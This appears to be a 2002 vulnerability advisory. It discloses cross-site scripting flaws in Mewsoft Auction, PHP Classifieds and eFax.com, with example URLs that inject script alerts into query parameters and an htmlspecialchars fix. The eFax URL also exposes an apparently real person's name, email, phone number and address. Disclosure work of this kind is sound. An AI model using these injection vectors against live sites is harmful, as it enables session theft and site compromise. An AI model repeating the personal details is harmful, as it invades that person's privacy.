Advisory name: SSI & CSS execution in Mewsoft Auction, PHP Classifieds and eFax.com Application: Mewsoft Auction (Perl script), PHP Classifieds (PHP), eFax.com (ASP) Date: 14.6.2002 Impact: remote user can execute shell commands & cross site scripting ===================================== CrossSiteScripting @ Mewsoft Auction Script <example> http://www.xxxx.com/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search &Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script >&Where=&Sort=Photo&Dir= </example> Program Name : Mewsoft Auction Program Version : 3.0 Home Page : http://www.mewsoft.com ===================================== CrossSiteScripting @ PHP Classifieds <example> http://www.xxxx.com/phpclassifieds/latestwap.php?url=<script>alert('OopS');< /script> </example> Program Name : PHP Classifieds Program Version : 6.05 Home Page : http://www.deltascripts.com/phpclassifieds ===================================== https://www.efax.com/signup/plus/invalid_cc.asp?FirstName=Nadeem&LastName=al i&OpSys=Win2000&Email=ra3e%5Fe7sas%40hotmail%2Ecom&PIN=9999&referralco de=&service=OR%2DPortland%2D503%2DP&VID=5&BID=427%2D2379%2D3151&HomePhone=53 02723558&OFFERCODE=EFAX%5FPLUS&orderNumber=43423716&CreditCardType=MC&Credit CardNumber=:)&expmonth=03&expyear=2003&StreetAddress=10621+Ced ar+Ave&StreetAddress2=&City=Grass+Valley&MailRegion=CA&PostalCode=95945&Coun try=United+States&LogoCode=&reorder_amount=&BillingFreq=Anually&startpage=1& agreed=yes&USCities=OR%2DPortland%2D503%2DP&EurCities=NONE&AsiaCities=NONE&L atCities=NONE&CCNumberError=<script>alert('OopS');</script> eFax web site have many CSS, thats was just one example.. Solution: DON'T trust the user, filter every thing ex in PHP: <? $input = HTMLSpecialChars($input); echo "<hr>your input was:<b>$input</b>"; ?> for your Information: CSS can be used SOMETIMES to execute shell commands on the web server (using SSI, depending on the WebServer Configuretion) , not only cookies hijack... § o m e 1 http://127.0.0.1/
